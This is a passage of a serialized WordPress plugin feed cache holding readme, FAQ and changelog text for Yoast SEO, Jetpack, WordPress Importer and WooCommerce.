tinyMCEHelper as window.YoastSEO.wp._tinyMCEHelper in JavaScript</li>\n<li>Exposes the ReplaceVar class in YoastReplaceVarPlugin as window.YoastReplaceVarPlugin.ReplaceVar in JavaScript</li>\n</ul>\n</li>\n<li>\n<p>Bugfixes</p>\n<ul>\n<li>Adds sanitization for the Twitter Image meta field</li>\n<li>Fixes use of <code>register_meta</code> for usage in WordPress 4.6 and higher</li>\n<li>Initialize the providers on hook <code>after_theme_setup</code> to make sure custom providers are added properly, props: <a href="https://github.com/stodorovic" rel="nofollow">stodorovic</a></li>\n<li>Changes the label of the &#8220;Bad&#8221; score to &#8220;Needs improvement&#8221; while filtering on SEO or readability scores.</li>\n</ul>\n</li>\n</ul>\n<h4>5.2.0</h4>\n<p>Release Date: August 8th, 2017</p>\n<ul>\n<li>\n<p>Enhancements</p>\n<ul>\n<li>Added wpseo_pre_adjacent_rel_links filter to bypass built-in rel prev/next functionality.</li>\n<li>Introduces classes to allow collecting data in the Premium plugin.</li>\n<li>Renamed OnPage.org to Ryte.</li>\n<li>Allow WordPress WHIP messages to be dismissed for a period of 4 weeks.</li>\n<li>Adds a filter for word combinations that consist of a single one-character word.</li>\n<li>Adds aria-current to the onboarding wizard active step.</li>\n</ul>\n</li>\n<li>\n<p>Bugfixes</p>\n<ul>\n<li>Removes JQMIGRATE JavaScript warnings.</li>\n</ul>\n</li>\n</ul>\n<h4>5.1.0</h4>\n<p>Release Date: July 25th, 2017</p>\n<ul>\n<li>\n<p>Enhancements</p>\n<ul>\n<li>Adds the post-type and taxonomy identifiers on the titles and metas settings tab.</li>\n<li>Adds support for importing of Jetpack SEO data.</li>\n<li>Improves the readability feature for Dutch, English, French, German, Italian and Spanish.</li>\n<li>Adds a WordPress SEO Premium motivation box on Yoast SEO settings pages.</li>\n<li>Adds a WordPress SEO Premium motivation on the social tabs.</li>\n<li>Adds support for third party sitemaps providers to be registered and used.</li>\n<li>Changes the column titles in the taxonomy list table to icons.</li>\n<li>Adds a subheader on the notification dashboard to clarify problems and issues which are muted.</li>\n<li>Improves avatars on the credit page, props <a href="https://github.com/mikedehart" rel="nofollow">Mike DeHart</a></li>\n</ul>\n</li>\n<li>\n<p>Bugfixes</p>\n<ul>\n<li>Fixes a bug where <code>remove_meta_if_default</code> and <code>dont_save_meta_if_default</code> don&#8217;t return the given input value as default.</li>\n<li>Fixes a performance issue related to calculating text link counts when saving a post.</li>\n<li>Fixes a typo in the readme.txt, props <a href="https://github.com/rayrutjes" rel="nofollow">Raymond Rutjes</a></li>\n</ul>\n</li>\n</ul>\n<h4>5.0.2</h4>\n<p>Release Date: July 13th, 2017</p>\n<ul>\n<li>Only load babel polyfill if it hasn&#8217;t been loaded by another plugin yet.</li>\n<li>Adds a feature toggle to disable the link counter tool &amp; link columns.</li>\n<li>Fixes a compatibility issue with WordPress 4.6.</li>\n<li>Fixes an issue where the link columns would disappear after quick-editing a post.</li>\n</ul>\n<h4>5.0.1</h4>\n<p>Release Date: July 6th, 2017</p>\n<ul>\n<li>Fixes a fatal error that could occur when trying to save a post that has <code>&lt;a&gt;</code>-tags with invalid URLs in it.</li>\n</ul>\n<h4>5.0.0</h4>\n<p>Release Date: July 6th, 2017</p>\n<ul>\n<li>\n<p>Bugfixes</p>\n<ul>\n<li>Fixes a bug where images via <code>https</code> were not working, props <a href="https://github.com/apfelbox" rel="nofollow">Jannik Zschiesche</a>.</li>\n<li>Fixes a bug where the whip notification can be shown multiple times.</li>\n</ul>\n</li>\n<li>\n<p>Enhancements</p>\n<ul>\n<li>Introduces a module that counts links in the content.</li>\n<li>Adds Flesch Reading for Italian.</li>\n<li>Changes &#8216;page title&#8217; to &#8216;seo title&#8217; in the snippet preview.</li>\n<li>Changes recommended maximum sentence length for Italian from 20 to 25 words, based on more in-depth research.</li>\n<li>Implements the extracted version of the Algolia Search which is now present in <code>yoast-components</code>.</li>\n<li>\n<p>Adds a banner for the structured data course.</p>\n</li>\n<li>\n<p>Under the hood</p>\n</li>\n<li>Introduces a database table to keep track of the linking structure. If the table cannot be created, a notification will be shown.</li>\n<li>When there are posts or pages to reindex, a notice will be shown.</li>\n</ul>\n</li>\n</ul>\n<h4>Earlier versions</h4>\n<p>For the changelog of earlier versions, please refer to the separate changelog.txt file.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n		\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:24:"Jetpack by WordPress.com";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:38:"https://wordpress.org/plugins/jetpack/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:47:"https://wordpress.org/plugins/jetpack/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 20 Jan 2011 02:21:38 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:41:"https://wordpress.org/plugins-wp/jetpack/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:112:"The one plugin you need for stats, related posts, search engine optimization, social sharing, protection,&#8230;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Automattic";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:9087:"<p><!--section=description--></p>\n<p>Keep any WordPress site secure, increase traffic, and engage your readers.</p>\n<h4>Traffic and SEO Tools</h4>\n<p>Traffic is the lifeblood of any website. Jetpack includes:</p>\n<ul>\n<li>[free] Site stats and analytics</li>\n<li>[free] Automatic sharing on Facebook, Twitter, LinkedIn, Tumblr, Reddit, and WhatsApp</li>\n<li>[free] Related posts</li>\n<li>[paid] Search engine optimization tools for Google, Bing, Twitter, Facebook, and WordPress.com</li>\n<li>[paid] Advertising program that includes the best of AdSense, Facebook Ads, AOL, Amazon, Google AdX, and Yahoo</li>\n</ul>\n<h4>Security and Backup Services</h4>\n<p>Stop worrying about data loss, downtime, and hacking. Jetpack provides:</p>\n<ul>\n<li>[free] Brute force attack protection</li>\n<li>[free] Downtime and uptime monitoring</li>\n<li>[free] Secured logins and two-factor authentication</li>\n<li>[paid] Malware scanning, code scanning, and threat resolution</li>\n<li>[paid] Site backups, restores, and migrations</li>\n</ul>\n<h4>Content Creation</h4>\n<p>Add rich, beautifully-presented media &#8212; no graphic design expertise necessary:</p>\n<ul>\n<li>[free] A high-speed CDN for your images</li>\n<li>[free] Carousels, slideshows, and tiled galleries</li>\n<li>[free] Simple embeds from YouTube, Google Documents, Spotify and more</li>\n<li>[free] Sidebar customization including Facebook, Twitter, and RSS feeds</li>\n<li>[free] Extra sidebar widgets including blog stats, calendar, and author widgets</li>\n<li>[paid] High-speed, ad-free, and high-definition video hosting</li>\n</ul>\n<h4>Discussion and Community</h4>\n<p>Create a connection with your readers and keep them coming back to your site with:</p>\n<ul>\n<li>[free] Email subscriptions</li>\n<li>[free] Comment login with Facebook, Twitter, and Google</li>\n<li>[free] Fully-customizable contact forms</li>\n<li>[free] Infinite scroll for your posts</li>\n</ul>\n<h4>Expert Support</h4>\n<p>We have an entire team of Happiness Engineers ready to help you. Ask your questions in the support forum, or <a href="https://jetpack.com/contact-support" rel="nofollow">contact us directly</a>.</p>\n<h4>Paid Services</h4>\n<p>Most of Jetpack&#8217;s features and services are free. Jetpack also provides advanced security and backup services, video hosting, site monetization, priority support, and more SEO tools in three <a href="https://jetpack.com/pricing?from=wporg" rel="nofollow">simple and affordable plans</a>.</p>\n<h4>Get Started</h4>\n<p>Installation is free, quick, and easy. Set up <a href="https://jetpack.com/install?from=wporg" rel="nofollow">the free plan</a> in minutes.</p>\n<p><!--section=installation--></p>\n<h4>Automated Installation</h4>\n<p>Installation is free, quick, and easy. <a href="https://jetpack.com/install?from=wporg" rel="nofollow">Install Jetpack from our site</a> in minutes.</p>\n<h4>Manual Alternatives</h4>\n<p>Alternatively, install Jetpack via the plugin directory, or upload the files manually to your server and follow the on-screen instructions. If you need additional help <a href="https://jetpack.com/support/installing-jetpack/" rel="nofollow">read our detailed instructions</a>.</p>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<h4>Automated Installation</h4>\n<p>Installation is free, quick, and easy. <a href="https://jetpack.com/install?from=wporg" rel="nofollow">Install Jetpack from our site</a> in minutes.</p>\n<h4>Manual Alternatives</h4>\n<p>Alternatively, install Jetpack via the plugin directory, or upload the files manually to your server and follow the on-screen instructions. If you need additional help <a href="https://jetpack.com/support/installing-jetpack/" rel="nofollow">read our detailed instructions</a>.</p>\n</dd>\n<dt>Is Jetpack Free?</dt>\n<dd>\n<p>Yes! Jetpack&#8217;s core features are and always will be free.</p>\n<p>These include: <a href="https://jetpack.com/features/traffic/site-stats" rel="nofollow">site stats</a>, a <a href="https://jetpack.com/features/writing/content-delivery-network/" rel="nofollow">high-speed CDN</a> for images, <a href="https://jetpack.com/features/traffic/related-posts" rel="nofollow">related posts</a>, <a href="https://jetpack.com/features/security/downtime-monitoring" rel="nofollow">downtime monitoring</a>, brute force <a href="https://jetpack.com/features/security/brute-force-attack-protection" rel="nofollow">attack protection</a>, <a href="https://jetpack.com/features/traffic/automatic-publishing/" rel="nofollow">automated sharing</a> to social networks, <a href="https://jetpack.com/features/writing/sidebar-customization/" rel="nofollow">sidebar customization</a>, and many more.</p>\n</dd>\n<dt>Should I purchase a paid plan?</dt>\n<dd>\n<p>Jetpack&#8217;s paid services include automated backups, security scanning, spam filtering, video hosting, site monetization, SEO tools, and priority support.</p>\n<p>If you&#8217;re interested in learning more about the extra layers of protection and advanced tools available, learn more about our <a href="https://jetpack.com/pricing?from=wporg" rel="nofollow">paid plans</a>.</p>\n</dd>\n<dt>Why do I need a WordPress.com account?</dt>\n<dd>\n<p>Since Jetpack and its services are provided and hosted by WordPress.com, a WordPress.com account is required for Jetpack to function.</p>\n</dd>\n<dt>I already have a WordPress account, but Jetpack isn&#8217;t working. What&#8217;s going on?</dt>\n<dd>\n<p>A WordPress.com account is different from the account you use to log into your self-hosted WordPress. If you can log into <a href="https://wordpress.com" rel="nofollow">WordPress.com</a>, then you already have a WordPress.com account. If you can&#8217;t, you can easily create one <a href="https://jetpack.com/install?from=wporg" rel="nofollow">during installation</a>.</p>\n</dd>\n<dt>How do I view my stats?</dt>\n<dd>\n<p>Once you&#8217;ve installed Jetpack your stats will be available on <a href="https://wordpress.com/stats" rel="nofollow">WordPress.com/Stats</a>, on the official <a href="https://apps.wordpress.com/mobile/" rel="nofollow">WordPress mobile apps</a>, and on your Jetpack dashboard.</p>\n</dd>\n<dt>How do I contribute to Jetpack?</dt>\n<dd>\n<p>There are opportunities for developers at all levels to contribute. <a href="https://jetpack.com/contribute" rel="nofollow">Learn more about contributing to Jetpack</a> or consider <a href="https://jetpack.com/beta" rel="nofollow">joining our beta program</a>.</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>5.2.1</h4>\n<ul>\n<li>Release date: August 2, 2017</li>\n<li>Release post: https://jetpack.com/?p=22686</li>\n</ul>\n<p><strong>Bug fixes</strong><br />\n* Solves an issue that caused widgets to lose their content when saved in WP Admin or Customizer.</p>\n<h4>5.2</h4>\n<ul>\n<li>Release date: August 1, 2017</li>\n<li>Release post: https://jetpack.com/?p=22509</li>\n</ul>\n<p><strong>Major Enhancements</strong><br />\n* Contact Forms now sports a fancy new interface that allows you to visually compose your form in the editor.<br />\n* We have a new and slick way to showcase and explain the features we recommend to activate to new users.</p>\n<p><strong>Enhancements</strong><br />\n* Reduced 500kb from plugin zip file, which means faster updates.<br />\n* Refactored and reduced code for Comment Likes so it&#8217;s faster and lighter.</p>\n<p><strong>Bug fixes</strong><br />\n* An inconsistency experienced in WordPress.com dashboard when Related Posts settings were set in the local site&#8217;s WP Admin is now fixed.<br />\n* Fixed a 404 when loading Open Sans font from a stylesheet plus now it&#8217;s only enqueued if it will be used.<br />\n* Solve PHP warnings when Image widget wasn&#8217;t migrated.</p>\n<h4>5.1</h4>\n<ul>\n<li>Release date: July 5th, 2017</li>\n<li>Release post: https://jetpack.com/?p=20888</li>\n</ul>\n<p><strong>Major Enhancements</strong><br />\n* You and your readers can now show appreciation to particularly clever comments with the new Comment Likes feature.</p>\n<p><strong>Enhancements</strong><br />\n* Quickly visit your current site&#8217;s front-end directly from the Masterbar&#8217;s new &#8220;View Site&#8221; item.<br />\n* Site data fetch from /me/sites REST API endpoint now includes <code>blog_public</code> in the list of returned options.<br />\n* The Flickr widget now automatically displays images in a grid if there&#8217;s enough room.<br />\n* E-mail sharing is now disabled by default unless it&#8217;s explicitly enabled by a filter or Akismet is active.</p>\n<p><strong>Compatibility Improvements</strong></p>\n<ul>\n<li>Updated instructions in Flickr widget to reflect recent changes to the Flickr UI.</li>\n</ul>\n<p><strong>Bug fixes</strong></p>\n<ul>\n<li>EU Cookie Law Banner cookie no longer cached.</li>\n<li>WP Admin menu can now be accessed in mobile when Masterbar is displayed.</li>\n<li>We now sync the <code>order_id</code> for <code>order_items</code> in older WooCommerce versions.</li>\n<li>UI now handles VaultPress connection or registration problems gracefully.</li>\n<li>Photon now works correctly with images uploaded before WordPress 2.7.</li>\n</ul>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:43:"https://wordpress.org/plugins/jetpack/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:18:"WordPress Importer";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:49:"https://wordpress.org/plugins/wordpress-importer/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 20 May 2010 18:48:47 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:13:"Uncategorized";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:52:"https://wordpress.org/plugins-wp/wordpress-importer/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:101:"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Brian Colinger";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:4618:"<p><!--section=description--></p>\n<p>The WordPress Importer will import the following content from a WordPress export file:</p>\n<ul>\n<li>Posts, pages and other custom post types</li>\n<li>Comments</li>\n<li>Custom fields and post meta</li>\n<li>Categories, tags and terms from custom taxonomies</li>\n<li>Authors</li>\n</ul>\n<p>For further information and instructions please see the <a href="https://codex.wordpress.org/Importing_Content#WordPress" rel="nofollow">Codex page on Importing Content</a></p>\n<h3>Filters</h3>\n<p>The importer has a couple of filters to allow you to completely enable/block certain features:</p>\n<ul>\n<li><code>import_allow_create_users</code>: return false if you only want to allow mapping to existing users</li>\n<li><code>import_allow_fetch_attachments</code>: return false if you do not wish to allow importing and downloading of attachments</li>\n<li><code>import_attachment_size_limit</code>: return an integer value for the maximum file size in bytes to save (default is 0, which is unlimited)</li>\n</ul>\n<p>There are also a few actions available to hook into:</p>\n<ul>\n<li><code>import_start</code>: occurs after the export file has been uploaded and author import settings have been chosen</li>\n<li><code>import_end</code>: called after the last output from the importer</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<p>The quickest method for installing the importer is:</p>\n<ol>\n<li>Visit Tools -&gt; Import in the WordPress dashboard</li>\n<li>Click on the WordPress link in the list of importers</li>\n<li>Click &#8220;Install Now&#8221;</li>\n<li>Finally click &#8220;Activate Plugin &amp; Run Importer&#8221;</li>\n</ol>\n<p>If you would prefer to do things manually then follow these instructions:</p>\n<ol>\n<li>Upload the <code>wordpress-importer</code> folder to the <code>/wp-content/plugins/</code> directory</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress</li>\n<li>Go to the Tools -&gt; Import screen, click on WordPress</li>\n</ol>\n</dd>\n<dt>Help! I&#8217;m getting out of memory errors or a blank screen.</dt>\n<dd>\n<p>If your exported file is very large, the import script may run into your host&#8217;s configured memory limit for PHP.</p>\n<p>A message like &#8220;Fatal error: Allowed memory size of 8388608 bytes exhausted&#8221; indicates that the script can&#8217;t successfully import your XML file under the current PHP memory limit. If you have access to the php.ini file, you can manually increase the limit; if you do not (your WordPress installation is hosted on a shared server, for instance), you might have to break your exported XML file into several smaller pieces and run the import script one at a time.</p>\n<p>For those with shared hosting, the best alternative may be to consult hosting support to determine the safest approach for running the import. A host may be willing to temporarily lift the memory limit and/or run the process directly from their end.</p>\n<p>&#8212; <a href="https://codex.wordpress.org/Importing_Content#Before_Importing" rel="nofollow">WordPress Codex: Importing Content</a></p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>0.6.3</h4>\n<ul>\n<li>Add support for import term metadata.</li>\n<li>Fix bug that caused slashes to be stripped from imported content.</li>\n<li>Fix bug that caused characters to be stripped inside of CDATA in some cases.</li>\n<li>Fix PHP notices.</li>\n</ul>\n<h4>0.6.2</h4>\n<ul>\n<li>Add wp_import_existing_post filter. See: https://core.trac.wordpress.org/ticket/33721</li>\n</ul>\n<h4>0.6</h4>\n<ul>\n<li>Support for WXR 1.2 and multiple CDATA sections</li>\n<li>Post aren&#8217;t duplicates if their post_type&#8217;s are different</li>\n</ul>\n<h4>0.5.2</h4>\n<ul>\n<li>Double check that the uploaded export file exists before processing it. This prevents incorrect error messages when<br />\nan export file is uploaded to a server with bad permissions and WordPress 3.3 or 3.3.1 is being used.</li>\n</ul>\n<h4>0.5</h4>\n<ul>\n<li>Import comment meta (requires export from WordPress 3.2)</li>\n<li>Minor bugfixes and enhancements</li>\n</ul>\n<h4>0.4</h4>\n<ul>\n<li>Map comment user_id where possible</li>\n<li>Import attachments from <code>wp:attachment_url</code></li>\n<li>Upload attachments to correct directory</li>\n<li>Remap resized image URLs correctly</li>\n</ul>\n<h4>0.3</h4>\n<ul>\n<li>Use an XML Parser if possible</li>\n<li>Proper import support for nav menus</li>\n<li>&#8230; and much more, see <a href="https://core.trac.wordpress.org/ticket/15197" rel="nofollow">Trac ticket #15197</a></li>\n</ul>\n<h4>0.1</h4>\n<ul>\n<li>Initial release</li>\n</ul>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n		\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:11:"WooCommerce";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:42:"https://wordpress.org/plugins/woocommerce/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:50:"https://wordpress.org/plugins/woocommerce/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 27 Sep 2011 15:32:48 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:45:"https://wordpress.org/plugins-wp/woocommerce/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:97:"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:9:"WooThemes";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:23662:"<p><!--section=description--></p>\n<p>WooCommerce is a free eCommerce plugin that allows you to sell anything, beautifully. Built to integrate seamlessly with WordPress, WooCommerce is the world’s favorite eCommerce solution that gives both store owners and developers complete control.</p>\n<p>With endless flexibility and access to hundreds of free and premium WordPress extensions, WooCommerce now powers 30% of all online stores &#8212; more than any other platform.</p>\n<iframe class=\'youtube-player\' type=\'text/html\' width=\'640\' height=\'390\' src=\'https://www.youtube.com/embed/1KahlicghaE?version=3&#038;rel=1&#038;fs=1&#038;autohide=2&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent\' allowfullscreen=\'true\' style=\'border:0;\'></iframe>\n<h4>Sell anything, anywhere</h4>\n<p>With WooCommerce, you can sell both physical and digital goods in all shapes and sizes, offer product variations, multiple configurations, and instant downloads to shoppers, and even sell affiliate goods from online marketplaces.</p>\n<p>With premium extensions, you can offer bookings, memberships, and recurring subscriptions. Perhaps you’d like to sell monthly subscriptions for physical goods, or offer your members a discount on digital downloads? It’s all possible.</p>\n<h4>Ship wherever you like</h4>\n<p>Offer free shipping, flat rate shipping, or make real-time calculations. Limit your shipments to specific countries, or open your store up to the world. Shipping is highly configurable, and WooCommerce even supports drop shipping.</p>\n<h4>Extensive payment options</h4>\n<p>WooCommerce comes bundled with the ability to accept major credit cards, PayPal, BACS (bank transfers), and cash on delivery. Need additional options? More than 140 region-specific gateways integrate with WooCommerce, including popular choices like Stripe, Authorize.Net, and Amazon Payments.</p>\n<h4>You control it all &#8212; forever</h4>\n<p>WooCommerce gives you complete control of your store, from taxes to stock levels to customer accounts. Add and remove extensions, change your design, and switch settings as you please. It’s all under your control.</p>\n<p>One of the biggest risks of using a hosted eCommerce platform is what happens to your store if the provider closes up shop. With WooCommerce, you have complete control, so there’s never any reason to worry. Your data belongs to you &#8212; and it’s kept secure, thanks to regular audits by industry leaders.</p>\n<h4>Define your style with Storefront</h4>\n<p><a href="https://wordpress.org/themes/storefront/" rel="nofollow">Storefront</a> is a free WordPress theme available to any WooCommerce store. Along with deep WooCommerce integration, Storefront prioritizes speed and uptime while eliminating theme and plugin conflicts during major updates.</p>\n<p>Define your style even further by customizing Storefront to your liking or choosing from one of our several <a href="https://woocommerce.com/product-category/themes/storefront-child-theme-themes/" rel="nofollow">Storefront child themes</a>. It’s all up to you, and all open source.</p>\n<h4>Built with developers in mind</h4>\n<p>Extendable, adaptable, and open source &#8212; WooCommerce was created with developers in mind. With its strong, robust framework, you can scale your client’s store all the way from basic to high-end (infinity and beyond).</p>\n<p>Built with a REST API, WooCommerce can integrate with virtually any service. Your store’s data can be accessed anywhere, anytime, 100% securely. WooCommerce allows developers to easily create, modify, and grow a store that meets their specifications.</p>\n<p>No matter the size of the store you want to build, WooCommerce will scale to meet your requirements. With a growing collection of more than 300 extensions, you can enhance each store’s features to meet your client’s unique needs &#8212; or even create your own solution.</p>\n<p>If security is a concern, rest easy. WooCommerce is audited by a dedicated team of developers working around the clock to identify and patch any and all discovered bugs.</p>\n<p>We also support WooCommerce and all its extensions with comprehensive, easily-accessible documentation. With our docs, you’ll learn how to create the exact site your client needs.</p>\n<h4>Extensions galore</h4>\n<p>WordPress.org is home to some amazing extensions for WooCommerce, including:</p>\n<ul>\n<li><a href="https://wordpress.org/plugins/woocommerce-google-analytics-integration/">Google Analytics</a></li>\n<li><a href="https://wordpress.org/plugins/woocommerce-delivery-notes/">Delivery Notes</a></li>\n<li><a href="https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/">PDF Invoices and Packing Slips</a></li>\n<li><a href="https://wordpress.org/plugins/affiliates-woocommerce-light/">Affiliates Integration Light</a></li>\n<li><a href="https://wordpress.org/plugins/woocommerce-new-product-badge/">New Product Badges</a></li>\n</ul>\n<p>Keen to see them all? Search WordPress.org for ‘WooCommerce’ to dive in.</p>\n<p>If you’re looking for something endorsed and maintained by the developers who built WooCommerce, there are a plethora of premium eCommerce extensions, the most popular of which include:</p>\n<ul>\n<li><a href="https://woocommerce.com/products/woocommerce-subscriptions/" rel="nofollow">WooCommerce Subscriptions</a></li>\n<li><a href="https://woocommerce.com/products/woocommerce-memberships/" rel="nofollow">WooCommerce Memberships</a></li>\n<li><a href="https://woocommerce.com/products/woocommerce-bookings/" rel="nofollow">WooCommerce Bookings</a></li>\n<li><a href="https://woocommerce.com/products/dynamic-pricing/" rel="nofollow">Dynamic Pricing</a></li>\n<li><a href="https://woocommerce.com/products/table-rate-shipping/" rel="nofollow">Table Rate Shipping</a></li>\n<li><a href="https://woocommerce.com/products/product-csv-import-suite/" rel="nofollow">Product CSV Import Suite</a></li>\n</ul>\n<p>And there’s plenty more where they came from. Visit our <a href="https://woocommerce.com/product-category/woocommerce-extensions/" rel="nofollow">extensions page</a> to find out everything you’re capable of and all that&#8217;s possible with premium WooCommerce extensions.</p>\n<h4>Join our growing community</h4>\n<p>When you download WooCommerce, you join a community of more than a million store owners, developers, and WordPress enthusiasts. We’re one of the fastest-growing open source communities online, and whether you’re a n00b or a Ninja, we’d love to have you!</p>\n<p>If you’re interested in contributing to WooCommerce we’ve got more than 350 contributors, and there’s always room for more. Head over to the <a href="https://github.com/woocommerce/woocommerce" rel="nofollow">WooCommerce GitHub Repository</a> to find out how you can pitch in.</p>\n<p>Want to add a new language to WooCommerce? Swell! You can contribute via <a href="https://translate.wordpress.org/projects/wp-plugins/woocommerce" rel="nofollow">translate.wordpress.org</a>.</p>\n<p>And, finally, consider joining or spearheading a WooCommerce Meetup locally, more about those <a href="https://woocommerce.com/woocommerce/meetups/" rel="nofollow">here</a>.</p>\n<p><!--section=installation--></p>\n<h4>Minimum Requirements</h4>\n<ul>\n<li>PHP version 5.2.4 or greater (PHP 5.6 or greater is recommended)</li>\n<li>MySQL version 5.0 or greater (MySQL 5.6 or greater is recommended)</li>\n<li>Some payment gateways require fsockopen support (for IPN access)</li>\n<li>WooCommerce 2.5 requires WordPress 